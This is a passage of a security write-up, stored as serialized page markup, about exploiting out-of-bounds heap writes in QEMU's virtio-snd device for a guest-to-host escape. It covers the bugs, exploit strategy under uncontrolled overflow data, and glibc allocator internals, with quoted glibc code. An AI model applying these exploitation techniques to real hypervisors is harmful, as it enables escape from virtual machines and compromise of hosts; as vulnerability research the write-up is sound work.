le32_to_cpu",{"type":26,"tag":137,"props":128425,"children":128426},{"style":5601},[128427],{"type":32,"value":165},{"type":26,"tag":137,"props":128429,"children":128430},{"style":5584},[128431],{"type":32,"value":100863},{"type":26,"tag":137,"props":128433,"children":128434},{"style":5601},[128435],{"type":32,"value":16348},{"type":26,"tag":137,"props":128437,"children":128438},{"style":5584},[128439],{"type":32,"value":128414},{"type":26,"tag":137,"props":128441,"children":128442},{"style":5601},[128443],{"type":32,"value":6430},{"type":26,"tag":137,"props":128445,"children":128446},{"class":5559,"line":6238},[128447,128451,128455,128459,128463,128467,128471,128475,128479,128483],{"type":26,"tag":137,"props":128448,"children":128449},{"style":5584},[128450],{"type":32,"value":128405},{"type":26,"tag":137,"props":128452,"children":128453},{"style":5601},[128454],{"type":32,"value":16348},{"type":26,"tag":137,"props":128456,"children":128457},{"style":5584},[128458],{"type":32,"value":127864},{"type":26,"tag":137,"props":128460,"children":128461},{"style":5590},[128462],{"type":32,"value":5593},{"type":26,"tag":137,"props":128464,"children":128465},{"style":5682},[128466],{"type":32,"value":128423},{"type":26,"tag":137,"props":128468,"children":128469},{"style":5601},[128470],{"type":32,"value":165},{"type":26,"tag":137,"props":128472,"children":128473},{"style":5584},[128474],{"type":32,"value":100863},{"type":26,"tag":137,"props":128476,"children":128477},{"style":5601},[128478],{"type":32,"value":16348},{"type":26,"tag":137,"props":128480,"children":128481},{"style":5584},[128482],{"type":32,"value":127864},{"type":26,"tag":137,"props":128484,"children":128485},{"style":5601},[128486],{"type":32,"value":6430},{"type":26,"tag":137,"props":128488,"children":128489},{"class":5559,"line":6247},[128490,128494,128498,128503,128507,128511,128515,128519,128523,128527],{"type":26,"tag":137,"props":128491,"children":128492},{"style":5584},[128493],{"type":32,"value":128405},{"type":26,"tag":137,"props":128495,"children":128496},{"style":5601},[128497],{"type":32,"value":16348},{"type":26,"tag":137,"props":128499,"children":128500},{"style":5584},[128501],{"type":32,"value":128502},"features",{"type":26,"tag":137,"props":128504,"children":128505},{"style":5590},[128506],{"type":32,"value":5593},{"type":26,"tag":137,"props":128508,"children":128509},{"style":5682},[128510],{"type":32,"value":128423},{"type":26,"tag":137,"props":128512,"children":128513},{"style":5601},[128514],{"type":32,"value":165},{"type":26,"tag":137,"props":128516,"children":128517},{"style":5584},[128518],{"type":32,"value":100863},{"type":26,"tag":137,"props":128520,"children":128521},{"style":5601},[128522],{"type":32,"value":16348},{"type":26,"tag":137,"props":128524,"children":128525},{"style":5584},[128526],{"type":32,"value":128502},{"type":26,"tag":137,"props":128528,"children":128529},{"style":5601},[128530],{"type":32,"value":6430},{"type":26,"tag":137,"props":128532,"children":128533},{"class":5559,"line":6270},[128534],{"type":26,"tag":137,"props":128535,"children":128536},{"style":5564},[128537],{"type":32,"value":128538},"    /* the following are uint8_t, so there's no need to bswap the values. */\n",{"type":26,"tag":137,"props":128540,"children":128541},{"class":5559,"line":6279},[128542,128546,128550,128555,128559,128564,128568,128572],{"type":26,"tag":137,"props":128543,"children":128544},{"style":5584},[128545],{"type":32,"value":128405},{"type":26,"tag":137,"props":128547,"children":128548},{"style":5601},[128549],{"type":32,"value":16348},{"type":26,"tag":137,"props":128551,"children":128552},{"style":5584},[128553],{"type":32,"value":128554},"channels",{"type":26,"tag":137,"props":128556,"children":128557},{"style":5590},[128558],{"type":32,"value":5593},{"type":26,"tag":137,"props":128560,"children":128561},{"style":5584},[128562],{"type":32,"value":128563}," params",{"type":26,"tag":137,"props":128565,"children":128566},{"style":5601},[128567],{"type":32,"value":16348},{"type":26,"tag":137,"props":128569,"children":128570},{"style":5584},[128571],{"type":32,"value":128554},{"type":26,"tag":137,"props":128573,"children":128574},{"style":5601},[128575],{"type":32,"value":5604},{"type":26,"tag":137,"props":128577,"children":128578},{"class":5559,"line":6288},[128579,128583,128587,128592,128596,128600,128604,128608],{"type":26,"tag":137,"props":128580,"children":128581},{"style":5584},[128582],{"type":32,"value":128405},{"type":26,"tag":137,"props":128584,"children":128585},{"style":5601},[128586],{"type":32,"value":16348},{"type":26,"tag":137,"props":128588,"children":128589},{"style":5584},[128590],{"type":32,"value":128591},"format",{"type":26,"tag":137,"props":128593,"children":128594},{"style":5590},[128595],{"type":32,"value":5593},{"type":26,"tag":137,"props":128597,"children":128598},{"style":5584},[128599],{"type":32,"value":128563},{"type":26,"tag":137,"props":128601,"children":128602},{"style":5601},[128603],{"type":32,"value":16348},{"type":26,"tag":137,"props":128605,"children":128606},{"style":5584},[128607],{"type":32,"value":128591},{"type":26,"tag":137,"props":128609,"children":128610},{"style":5601},[128611],{"type":32,"value":5604},{"type":26,"tag":137,"props":128613,"children":128614},{"class":5559,"line":6355},[128615,128619,128623,128628,128632,128636,128640,128644],{"type":26,"tag":137,"props":128616,"children":128617},{"style":5584},[128618],{"type":32,"value":128405},{"type":26,"tag":137,"props":128620,"children":128621},{"style":5601},[128622],{"type":32,"value":16348},{"type":26,"tag":137,"props":128624,"children":128625},{"style":5584},[128626],{"type":32,"value":128627},"rate",{"type":26,"tag":137,"props":128629,"children":128630},{"style":5590},[128631],{"type":32,"value":5593},{"type":26,"tag":137,"props":128633,"children":128634},{"style":5584},[128635],{"type":32,"value":128563},{"type":26,"tag":137,"props":128637,"children":128638},{"style":5601},[128639],{"type":32,"value":16348},{"type":26,"tag":137,"props":128641,"children":128642},{"style":5584},[128643],{"type":32,"value":128627},{"type":26,"tag":137,"props":128645,"children":128646},{"style":5601},[128647],{"type":32,"value":5604},{"type":26,"tag":137,"props":128649,"children":128650},{"class":5559,"line":6363},[128651],{"type":26,"tag":137,"props":128652,"children":128653},{"emptyLinePlaceholder":18},[128654],{"type":32,"value":6276},{"type":26,"tag":137,"props":128656,"children":128657},{"class":5559,"line":6393},[128658,128662,128667],{"type":26,"tag":137,"props":128659,"children":128660},{"style":5610},[128661],{"type":32,"value":19582},{"type":26,"tag":137,"props":128663,"children":128664},{"style":5682},[128665],{"type":32,"value":128666}," cpu_to_le32",{"type":26,"tag":137,"props":128668,"children":128669},{"style":5601},[128670],{"type":32,"value":128671},"(VIRTIO_SND_S_OK);\n",{"type":26,"tag":137,"props":128673,"children":128674},{"class":5559,"line":6401},[128675],{"type":26,"tag":137,"props":128676,"children":128677},{"style":5601},[128678],{"type":32,"value":6507},{"type":26,"tag":35,"props":128680,"children":128681},{},[128682,128684,128689,128691,128697,128699,128704,128706,128711,128713,128719,128720,128725],{"type":32,"value":128683},"Among the guest-controlled PCM parameters, format matters later for exploit reliability. For 8-bit PCM, QEMU accepts both unsigned (",{"type":26,"tag":130,"props":128685,"children":128687},{"className":128686},[],[128688],{"type":32,"value":6012},{"type":32,"value":128690},") and signed (",{"type":26,"tag":130,"props":128692,"children":128694},{"className":128693},[],[128695],{"type":32,"value":128696},"s8",{"type":32,"value":128698},") samples. They encode the same waveform differently - silence is ",{"type":26,"tag":130,"props":128700,"children":128702},{"className":128701},[],[128703],{"type":32,"value":32033},{"type":32,"value":128705}," in ",{"type":26,"tag":130,"props":128707,"children":128709},{"className":128708},[],[128710],{"type":32,"value":6012},{"type":32,"value":128712},", but ",{"type":26,"tag":130,"props":128714,"children":128716},{"className":128715},[],[128717],{"type":32,"value":128718},"0x00",{"type":32,"value":128705},{"type":26,"tag":130,"props":128721,"children":128723},{"className":128722},[],[128724],{"type":32,"value":128696},{"type":32,"value":470},{"type":26,"tag":3265,"props":128727,"children":128728},{},[],{"type":26,"tag":35,"props":128730,"children":128731},{},[128732],{"type":32,"value":128733},"To summarize:",{"type":26,"tag":4820,"props":128735,"children":128736},{},[128737,128756,128774],{"type":26,"tag":3430,"props":128738,"children":128739},{},[128740,128742,128747,128749,128754],{"type":32,"value":128741},"an integer underflow in the ",{"type":26,"tag":130,"props":128743,"children":128745},{"className":128744},[],[128746],{"type":32,"value":126812},{"type":32,"value":128748}," calculation in ",{"type":26,"tag":130,"props":128750,"children":128752},{"className":128751},[],[128753],{"type":32,"value":126317},{"type":32,"value":128755},", resulting in an 8-byte (or less) under-allocation",{"type":26,"tag":3430,"props":128757,"children":128758},{},[128759,128761,128766,128767,128772],{"type":32,"value":128760},"a mismatch in the ",{"type":26,"tag":130,"props":128762,"children":128764},{"className":128763},[],[128765],{"type":32,"value":128043},{"type":32,"value":128748},{"type":26,"tag":130,"props":128768,"children":128770},{"className":128769},[],[128771],{"type":32,"value":128141},{"type":32,"value":128773},", leading to at most 8-byte OOB write",{"type":26,"tag":3430,"props":128775,"children":128776},{},[128777,128779,128784,128786,128791,128793,128798],{"type":32,"value":128778},"a missing bound in the ",{"type":26,"tag":130,"props":128780,"children":128782},{"className":128781},[],[128783],{"type":32,"value":126812},{"type":32,"value":128785}," passed to ",{"type":26,"tag":130,"props":128787,"children":128789},{"className":128788},[],[128790],{"type":32,"value":128161},{"type":32,"value":128792},", which does not take the actual buffer allocation size into account and can therefore lead to an OOB write of an arbitrary length, up to ",{"type":26,"tag":130,"props":128794,"children":128796},{"className":128795},[],[128797],{"type":32,"value":128184},{"type":32,"value":84891},{"type":26,"tag":35,"props":128800,"children":128801},{},[128802,128804,128809,128811,128816,128818,128824],{"type":32,"value":128803},"In our exploit, we focus on the third bug because it provides the largest overflow and therefore the most useful primitive. In practice, the actual write is still bounded by ",{"type":26,"tag":130,"props":128805,"children":128807},{"className":128806},[],[128808],{"type":32,"value":128184},{"type":32,"value":128810},", but in our setup with the ALSA backend, ",{"type":26,"tag":130,"props":128812,"children":128814},{"className":128813},[],[128815],{"type":32,"value":128184},{"type":32,"value":128817}," was consistently around ",{"type":26,"tag":130,"props":128819,"children":128821},{"className":128820},[],[128822],{"type":32,"value":128823},"4096",{"type":32,"value":470},{"type":26,"tag":35,"props":128826,"children":128827},{},[128828,128830,128837,128838,128845],{"type":32,"value":128829},"It is also worth noting that the timing here was particularly unlucky - these bugs had been present in QEMU for over two years, but they were fixed (",{"type":26,"tag":41,"props":128831,"children":128834},{"href":128832,"rel":128833},"https://github.com/qemu/qemu/commit/bcb53328aa70023f1405fade4e253e7f77567261",[45],[128835],{"type":32,"value":128836},"commit 1",{"type":32,"value":1108},{"type":26,"tag":41,"props":128839,"children":128842},{"href":128840,"rel":128841},"https://github.com/qemu/qemu/commit/7994203bb1b83a6604f3ab00fe9598909bb66164",[45],[128843],{"type":32,"value":128844},"commit 2",{"type":32,"value":128846},") in the very same week that we independently found them while manually reviewing the code.",{"type":26,"tag":92,"props":128848,"children":128849},{"id":102689},[128850],{"type":32,"value":102692},{"type":26,"tag":35,"props":128852,"children":128853},{},[128854],{"type":32,"value":128855},"Each of these bugs is in the audio input path. Since that audio input comes from the host side, the bytes written out of bounds are not controlled by the guest and, from the exploit perspective, can be treated as effectively random.",{"type":26,"tag":35,"props":128857,"children":128858},{},[128859],{"type":32,"value":128860},"This gives an interesting challenge: how do you exploit an out-of-bounds write when you do not control the data being written?",{"type":26,"tag":118,"props":128862,"children":128864},{"id":128863},"achieving-a-better-primitive",[128865],{"type":32,"value":128866},"Achieving a Better Primitive",{"type":26,"tag":35,"props":128868,"children":128869},{},[128870],{"type":32,"value":128871},"The first idea that comes to mind is to target some kind of size or offset field. The goal is to make that field as small as possible initially, trigger the overflow, and rely on the corrupted bytes being larger than the original value. Such scenario would transform a weak primitive into a much more useful one, giving us a better starting point for the rest of the exploit.",{"type":26,"tag":35,"props":128873,"children":128874},{},[128875],{"type":32,"value":128876},"However, after searching QEMU for such objects we didn't find a suitable target. The main problem was that, in most cases, the field we wanted to corrupt was preceded by one or more pointers. That would have been acceptable if those pointers were unused, but in every candidate object we examined they were still live. As a result, the heap overflow would corrupt them with effectively random bytes, causing an invalid dereference and crashing QEMU before we could achieve our desired guest-to-host escape.",{"type":26,"tag":35,"props":128878,"children":128879},{},[128880],{"type":32,"value":128881},"At that point, we turned our attention to the glibc allocator. This is usually not the first choice in such targets - allocator techniques are often more version-specific and less portable than program-specific primitives (for example, type confusion on known object layouts). So allocator attacks are often a fallback once object-level paths are exhausted.",{"type":26,"tag":21485,"props":128883,"children":128885},{"id":128884},"glibc-allocator",[128886],{"type":32,"value":128887},"Glibc Allocator",{"type":26,"tag":35,"props":128889,"children":128890},{},[128891,128893,128900],{"type":32,"value":128892},"The glibc allocator has already been studied and documented extensively, so we will only cover the basics relevant to this exploit. A good resource for both current and older attack techniques is ",{"type":26,"tag":41,"props":128894,"children":128897},{"href":128895,"rel":128896},"https://github.com/shellphish/how2heap",[45],[128898],{"type":32,"value":128899},"how2heap",{"type":32,"value":470},{"type":26,"tag":39942,"props":128902,"children":128904},{"id":128903},"chunk-layout-and-bins",[128905],{"type":32,"value":128906},"Chunk Layout and Bins",{"type":26,"tag":35,"props":128908,"children":128909},{},[128910],{"type":32,"value":128911},"A chunk looks like this:",{"type":26,"tag":5512,"props":128913,"children":128915},{"code":128914},"       +0x0          +0x8\n      +-------------+-------------+\n      |  prev_size  |    size     |\n      +---------------------------+\n+0x10 |  41 41 41 41 41 41 41 41  |\n      |                           |\n      |  41 41 41 41 41 41 41 41  |\n      |                           |\n      |           . . .           |\n",[128916],{"type":26,"tag":130,"props":128917,"children":128918},{"__ignoreMap":7},[128919],{"type":32,"value":128914},{"type":26,"tag":35,"props":128921,"children":128922},{},[128923,128925,128931,128933,128939,128940,128945,128946,128952,128954,128959,128961,128966,128968,128974,128975,128981,128983,128989],{"type":32,"value":128924},"The first 16 bytes form the chunk header. It consists of the ",{"type":26,"tag":130,"props":128926,"children":128928},{"className":128927},[],[128929],{"type":32,"value":128930},"prev_size",{"type":32,"value":128932}," field at offset ",{"type":26,"tag":130,"props":128934,"children":128936},{"className":128935},[],[128937],{"type":32,"value":128938},"0x0",{"type":32,"value":40146},{"type":26,"tag":130,"props":128941,"children":128943},{"className":128942},[],[128944],{"type":32,"value":126812},{"type":32,"value":128932},{"type":26,"tag":130,"props":128947,"children":128949},{"className":128948},[],[128950],{"type":32,"value":128951},"0x8",{"type":32,"value":128953},". As the name suggests, ",{"type":26,"tag":130,"props":128955,"children":128957},{"className":128956},[],[128958],{"type":32,"value":128930},{"type":32,"value":128960}," stores the size of the previous chunk and is only used when that chunk is free, while ",{"type":26,"tag":130,"props":128962,"children":128964},{"className":128963},[],[128965],{"type":32,"value":126812},{"type":32,"value":128967}," stores the size of the current chunk and three special bits of which ",{"type":26,"tag":130,"props":128969,"children":128971},{"className":128970},[],[128972],{"type":32,"value":128973},"PREV_INUSE",{"type":32,"value":3339},{"type":26,"tag":130,"props":128976,"children":128978},{"className":128977},[],[128979],{"type":32,"value":128980},"IS_MMAPPED",{"type":32,"value":128982}," are relevant for this blog post. The actual chunk data begins at offset ",{"type":26,"tag":130,"props":128984,"children":128986},{"className":128985},[],[128987],{"type":32,"value":128988},"0x10",{"type":32,"value":470},{"type":26,"tag":35,"props":128991,"children":128992},{},[128993],{"type":32,"value":128994},"Freed chunks are organized into different bins depending on their size and state. For this writeup, the important one is the per-thread cache, or tcache. Tcache stores recently freed chunks in size-segregated singly linked lists and is generally the first place glibc looks when servicing small allocations.",{"type":26,"tag":39942,"props":128996,"children":128998},{"id":128997},"free-path",[128999],{"type":32,"value":129000},"free() path",{"type":26,"tag":35,"props":129002,"children":129003},{},[129004,129006,129012],{"type":32,"value":129005},"Let’s first look at the ",{"type":26,"tag":130,"props":129007,"children":129009},{"className":129008},[],[129010],{"type":32,"value":129011},"free()",{"type":32,"value":129013}," path in glibc 2.40:",{"type":26,"tag":5512,"props":129015,"children":129017},{"code":129016,"language":4326,"meta":7,"className":19107,"style":7},"__libc_free (void *mem)\n{\n  mstate ar_ptr;\n  mchunkptr p;\n\n  p = mem2chunk (mem);\n  if (chunk_is_mmapped (p))\n    {\n      munmap_chunk (p);\n    }\n  else\n    {\n      MAYBE_INIT_TCACHE ();\n\n      ar_ptr = arena_for_chunk (p);\n      _int_free (ar_ptr, p, 0);\n    }\n}\n",[129018],{"type":26,"tag":130,"props":129019,"children":129020},{"__ignoreMap":7},[129021,129049,129056,129064,129072,129079,129101,129122,129129,129142,129149,129157,129164,129177,129184,129205,129226,129233],{"type":26,"tag":137,"props":129022,"children":129023},{"class":5559,"line":5560},[129024,129029,129033,129037,129041,129045],{"type":26,"tag":137,"props":129025,"children":129026},{"style":5682},[129027],{"type":32,"value":129028},"__libc_free",{"type":26,"tag":137,"props":129030,"children":129031},{"style":5601},[129032],{"type":32,"value":4625},{"type":26,"tag":137,"props":129034,"children":129035},{"style":5573},[129036],{"type":32,"value":54230},{"type":26,"tag":137,"props":129038,"children":129039},{"style":5590},[129040],{"type":32,"value":12406},{"type":26,"tag":137,"props":129042,"children":129043},{"style":5584},[129044],{"type":32,"value":43261},{"type":26,"tag":137,"props":129046,"children":129047},{"style":5601},[129048],{"type":32,"value":5742},{"type":26,"tag":137,"props":129050,"children":129051},{"class":5559,"line":5412},[129052],{"type":26,"tag":137,"props":129053,"children":129054},{"style":5601},[129055],{"type":32,"value":13471},{"type":26,"tag":137,"props":129057,"children":129058},{"class":5559,"line":5417},[129059],{"type":26,"tag":137,"props":129060,"children":129061},{"style":5601},[129062],{"type":32,"value":129063},"  mstate ar_ptr;\n",{"type":26,"tag":137,"props":129065,"children":129066},{"class":5559,"line":5642},[129067],{"type":26,"tag":137,"props":129068,"children":129069},{"style":5601},[129070],{"type":32,"value":129071},"  mchunkptr p;\n",{"type":26,"tag":137,"props":129073,"children":129074},{"class":5559,"line":5745},[129075],{"type":26,"tag":137,"props":129076,"children":129077},{"emptyLinePlaceholder":18},[129078],{"type":32,"value":6276},{"type":26,"tag":137,"props":129080,"children":129081},{"class":5559,"line":5850},[129082,129087,129091,129096],{"type":26,"tag":137,"props":129083,"children":129084},{"style":5601},[129085],{"type":32,"value":129086},"  p ",{"type":26,"tag":137,"props":129088,"children":129089},{"style":5590},[129090],{"type":32,"value":289},{"type":26,"tag":137,"props":129092,"children":129093},{"style":5682},[129094],{"type":32,"value":129095}," mem2chunk",{"type":26,"tag":137,"props":129097,"children":129098},{"style":5601},[129099],{"type":32,"value":129100}," (mem);\n",{"type":26,"tag":137,"props":129102,"children":129103},{"class":5559,"line":5878},[129104,129108,129112,129117],{"type":26,"tag":137,"props":129105,"children":129106},{"style":5610},[129107],{"type":32,"value":33989},{"type":26,"tag":137,"props":129109,"children":129110},{"style":5601},[129111],{"type":32,"value":4625},{"type":26,"tag":137,"props":129113,"children":129114},{"style":5682},[129115],{"type":32,"value":129116},"chunk_is_mmapped",{"type":26,"tag":137,"props":129118,"children":129119},{"style":5601},[129120],{"type":32,"value":129121}," (p))\n",{"type":26,"tag":137,"props":129123,"children":129124},{"class":5559,"line":5891},[129125],{"type":26,"tag":137,"props":129126,"children":129127},{"style":5601},[129128],{"type":32,"value":31781},{"type":26,"tag":137,"props":129130,"children":129131},{"class":5559,"line":5909},[129132,129137],{"type":26,"tag":137,"props":129133,"children":129134},{"style":5682},[129135],{"type":32,"value":129136},"      munmap_chunk",{"type":26,"tag":137,"props":129138,"children":129139},{"style":5601},[129140],{"type":32,"value":129141}," (p);\n",{"type":26,"tag":137,"props":129143,"children":129144},{"class":5559,"line":5930},[129145],{"type":26,"tag":137,"props":129146,"children":129147},{"style":5601},[129148],{"type":32,"value":5945},{"type":26,"tag":137,"props":129150,"children":129151},{"class":5559,"line":5939},[129152],{"type":26,"tag":137,"props":129153,"children":129154},{"style":5610},[129155],{"type":32,"value":129156},"  else\n",{"type":26,"tag":137,"props":129158,"children":129159},{"class":5559,"line":6191},[129160],{"type":26,"tag":137,"props":129161,"children":129162},{"style":5601},[129163],{"type":32,"value":31781},{"type":26,"tag":137,"props":129165,"children":129166},{"class":5559,"line":6208},[129167,129172],{"type":26,"tag":137,"props":129168,"children":129169},{"style":5682},[129170],{"type":32,"value":129171},"      MAYBE_INIT_TCACHE",{"type":26,"tag":137,"props":129173,"children":129174},{"style":5601},[129175],{"type":32,"value":129176}," ();\n",{"type":26,"tag":137,"props":129178,"children":129179},{"class":5559,"line":6225},[129180],{"type":26,"tag":137,"props":129181,"children":129182},{"emptyLinePlaceholder":18},[129183],{"type":32,"value":6276},{"type":26,"tag":137,"props":129185,"children":129186},{"class":5559,"line":6238},[129187,129192,129196,129201],{"type":26,"tag":137,"props":129188,"children":129189},{"style":5601},[129190],{"type":32,"value":129191},"      ar_ptr ",{"type":26,"tag":137,"props":129193,"children":129194},{"style":5590},[129195],{"type":32,"value":289},{"type":26,"tag":137,"props":129197,"children":129198},{"style":5682},[129199],{"type":32,"value":129200}," arena_for_chunk",{"type":26,"tag":137,"props":129202,"children":129203},{"style":5601},[129204],{"type":32,"value":129141},{"type":26,"tag":137,"props":129206,"children":129207},{"class":5559,"line":6247},[129208,129213,129218,129222],{"type":26,"tag":137,"props":129209,"children":129210},{"style":5682},[129211],{"type":32,"value":129212},"      _int_free",{"type":26,"tag":137,"props":129214,"children":129215},{"style":5601},[129216],{"type":32,"value":129217}," (ar_ptr, p, ",{"type":26,"tag":137,"props":129219,"children":129220},{"style":5626},[129221],{"type":32,"value":1817},{"type":26,"tag":137,"props":129223,"children":129224},{"style":5601},[129225],{"type":32,"value":6430},{"type":26,"tag":137,"props":129227,"children":129228},{"class":5559,"line":6270},[129229],{"type":26,"tag":137,"props":129230,"children":129231},{"style":5601},[129232],{"type":32,"value":5945},{"type":26,"tag":137,"props":129234,"children":129235},{"class":5559,"line":6279},[129236],{"type":26,"tag":137,"props":129237,"children":129238},{"style":5601},[129239],{"type":32,"value":6507},{"type":26,"tag":35,"props":129241,"children":129242},{},[129243,129245,129250,129252,129257,129259,129265,129267,129273,129275,129280,129282,129287,129289,129294,129296,129301],{"type":32,"value":129244},"We can see that if the ",{"type":26,"tag":130,"props":129246,"children":129248},{"className":129247},[],[129249],{"type":32,"value":128980},{"type":32,"value":129251}," bit is set in the corrupted ",{"type":26,"tag":130,"props":129253,"children":129255},{"className":129254},[],[129256],{"type":32,"value":126812},{"type":32,"value":129258}," field, glibc will call ",{"type":26,"tag":130,"props":129260,"children":129262},{"className":129261},[],[129263],{"type":32,"value":129264},"munmap_chunk",{"type":32,"value":129266},", which internally checks that ",{"type":26,"tag":130,"props":129268,"children":129270},{"className":129269},[],[129271],{"type":32,"value":129272},"prev_size + size",{"type":32,"value":129274}," is page-aligned. To reach the ",{"type":26,"tag":130,"props":129276,"children":129278},{"className":129277},[],[129279],{"type":32,"value":126812},{"type":32,"value":129281}," field, we first have to overwrite the entire 8-byte ",{"type":26,"tag":130,"props":129283,"children":129285},{"className":129284},[],[129286],{"type":32,"value":128930},{"type":32,"value":129288}," field with uncontrolled data. The chance that a corrupted ",{"type":26,"tag":130,"props":129290,"children":129292},{"className":129291},[],[129293],{"type":32,"value":129272},{"type":32,"value":129295}," value still ends up page-aligned is extremely small. In practice, if ",{"type":26,"tag":130,"props":129297,"children":129299},{"className":129298},[],[129300],{"type":32,"value":128980},{"type":32,"value":129302}," is set, the process will almost certainly abort before we can make use of the corruption.",{"type":26,"tag":35,"props":129304,"children":129305},{},[129306,129308,129313,129315,129321],{"type":32,"value":129307},"Assuming ",{"type":26,"tag":130,"props":129309,"children":129311},{"className":129310},[],[129312],{"type":32,"value":128980},{"type":32,"value":129314}," is not set, execution continues into ",{"type":26,"tag":130,"props":129316,"children":129318},{"className":129317},[],[129319],{"type":32,"value":129320},"_int_free",{"type":32,"value":7072},{"type":26,"tag":5512,"props":129323,"children":129325},{"code":129324,"language":4326,"meta":7,"className":19107,"style":7},"static void\n_int_free (mstate av, mchunkptr p, int have_lock)\n{\n  INTERNAL_SIZE_T size;\n\n  size = chunksize (p);\n\n  /* Little security check which won't hurt performance: the\n     allocator never wraps around at the end of the address space.\n     Therefore we can exclude some size values which might appear\n     here by accident or by \"design\" from some intruder.  */\n  if (__builtin_expect ((uintptr_t) p > (uintptr_t) -size, 0)\n      || __builtin_expect (misaligned_chunk (p), 0))\n    malloc_printerr (\"free(): invalid pointer\");\n  /* We know that each chunk is at least MINSIZE bytes in size or a\n     multiple of MALLOC_ALIGNMENT.  */\n  if (__glibc_unlikely (size \u003C MINSIZE || !aligned_OK (size)))\n    malloc_printerr (\"free(): invalid size\");\n\n  check_inuse_chunk(av, p);\n\n  [...]\n",[129326],{"type":26,"tag":130,"props":129327,"children":129328},{"__ignoreMap":7},[129329,129341,129384,129391,129399,129406,129427,129434,129442,129450,129458,129466,129530,129565,129586,129594,129602,129650,129670,129677,129690,129697],{"type":26,"tag":137,"props":129330,"children":129331},{"class":5559,"line":5560},[129332,129336],{"type":26,"tag":137,"props":129333,"children":129334},{"style":5573},[129335],{"type":32,"value":53647},{"type":26,"tag":137,"props":129337,"children":129338},{"style":5573},[129339],{"type":32,"value":129340}," void\n",{"type":26,"tag":137,"props":129342,"children":129343},{"class":5559,"line":5412},[129344,129348,129353,129358,129363,129367,129371,129375,129380],{"type":26,"tag":137,"props":129345,"children":129346},{"style":5682},[129347],{"type":32,"value":129320},{"type":26,"tag":137,"props":129349,"children":129350},{"style":5601},[129351],{"type":32,"value":129352}," (mstate ",{"type":26,"tag":137,"props":129354,"children":129355},{"style":5584},[129356],{"type":32,"value":129357},"av",{"type":26,"tag":137,"props":129359,"children":129360},{"style":5601},[129361],{"type":32,"value":129362},", mchunkptr ",{"type":26,"tag":137,"props":129364,"children":129365},{"style":5584},[129366],{"type":32,"value":35},{"type":26,"tag":137,"props":129368,"children":129369},{"style":5601},[129370],{"type":32,"value":1108},{"type":26,"tag":137,"props":129372,"children":129373},{"style":5573},[129374],{"type":32,"value":21640},{"type":26,"tag":137,"props":129376,"children":129377},{"style":5584},[129378],{"type":32,"value":129379}," have_lock",{"type":26,"tag":137,"props":129381,"children":129382},{"style":5601},[129383],{"type":32,"value":5742},{"type":26,"tag":137,"props":129385,"children":129386},{"class":5559,"line":5417},[129387],{"type":26,"tag":137,"props":129388,"children":129389},{"style":5601},[129390],{"type":32,"value":13471},{"type":26,"tag":137,"props":129392,"children":129393},{"class":5559,"line":5642},[129394],{"type":26,"tag":137,"props":129395,"children":129396},{"style":5601},[129397],{"type":32,"value":129398},"  INTERNAL_SIZE_T size;\n",{"type":26,"tag":137,"props":129400,"children":129401},{"class":5559,"line":5745},[129402],{"type":26,"tag":137,"props":129403,"children":129404},{"emptyLinePlaceholder":18},[129405],{"type":32,"value":6276},{"type":26,"tag":137,"props":129407,"children":129408},{"class":5559,"line":5850},[129409,129414,129418,129423],{"type":26,"tag":137,"props":129410,"children":129411},{"style":5601},[129412],{"type":32,"value":129413},"  size ",{"type":26,"tag":137,"props":129415,"children":129416},{"style":5590},[129417],{"type":32,"value":289},{"type":26,"tag":137,"props":129419,"children":129420},{"style":5682},[129421],{"type":32,"value":129422}," chunksize",{"type":26,"tag":137,"props":129424,"children":129425},{"style":5601},[129426],{"type":32,"value":129141},{"type":26,"tag":137,"props":129428,"children":129429},{"class":5559,"line":5878},[129430],{"type":26,"tag":137,"props":129431,"children":129432},{"emptyLinePlaceholder":18},[129433],{"type":32,"value":6276},{"type":26,"tag":137,"props":129435,"children":129436},{"class":5559,"line":5891},[129437],{"type":26,"tag":137,"props":129438,"children":129439},{"style":5564},[129440],{"type":32,"value":129441},"  /* Little security check which won't hurt performance: the\n",{"type":26,"tag":137,"props":129443,"children":129444},{"class":5559,"line":5909},[129445],{"type":26,"tag":137,"props":129446,"children":129447},{"style":5564},[129448],{"type":32,"value":129449},"     allocator never wraps around at the end of the address space.\n",{"type":26,"tag":137,"props":129451,"children":129452},{"class":5559,"line":5930},[129453],{"type":26,"tag":137,"props":129454,"children":129455},{"style":5564},[129456],{"type":32,"value":129457},"     Therefore we can exclude some size values which might appear\n",{"type":26,"tag":137,"props":129459,"children":129460},{"class":5559,"line":5939},[129461],{"type":26,"tag":137,"props":129462,"children":129463},{"style":5564},[129464],{"type":32,"value":129465},"     here by accident or by \"design\" from some intruder.  */\n",{"type":26,"tag":137,"props":129467,"children":129468},{"class":5559,"line":6191},[129469,129473,129477,129482,129487,129492,129497,129501,129505,129509,129513,129517,129522,129526],{"type":26,"tag":137,"props":129470,"children":129471},{"style":5610},[129472],{"type":32,"value":33989},{"type":26,"tag":137,"props":129474,"children":129475},{"style":5601},[129476],{"type":32,"value":4625},{"type":26,"tag":137,"props":129478,"children":129479},{"style":5682},[129480],{"type":32,"value":129481},"__builtin_expect",{"type":26,"tag":137,"props":129483,"children":129484},{"style":5601},[129485],{"type":32,"value":129486}," ((",{"type":26,"tag":137,"props":129488,"children":129489},{"style":5573},[129490],{"type":32,"value":129491},"uintptr_t",{"type":26,"tag":137,"props":129493,"children":129494},{"style":5601},[129495],{"type":32,"value":129496},") p ",{"type":26,"tag":137,"props":129498,"children":129499},{"style":5590},[129500],{"type":32,"value":13052},{"type":26,"tag":137,"props":129502,"children":129503},{"style":5601},[129504],{"type":32,"value":4625},{"type":26,"tag":137,"props":129506,"children":129507},{"style":5573},[129508],{"type":32,"value":129491},{"type":26,"tag":137,"props":129510,"children":129511},{"style":5601},[129512],{"type":32,"value":5671},{"type":26,"tag":137,"props":129514,"children":129515},{"style":5590},[129516],{"type":32,"value":6908},{"type":26,"tag":137,"props":129518,"children":129519},{"style":5601},[129520],{"type":32,"value":129521},"size, ",{"type":26,"tag":137,"props":129523,"children":129524},{"style":5626},[129525],{"type":32,"value":1817},{"type":26,"tag":137,"props":129527,"children":129528},{"style":5601},[129529],{"type":32,"value":5742},{"type":26,"tag":137,"props":129531,"children":129532},{"class":5559,"line":6208},[129533,129538,129543,129547,129552,129557,129561],{"type":26,"tag":137,"props":129534,"children":129535},{"style":5590},[129536],{"type":32,"value":129537},"      ||",{"type":26,"tag":137,"props":129539,"children":129540},{"style":5682},[129541],{"type":32,"value":129542}," 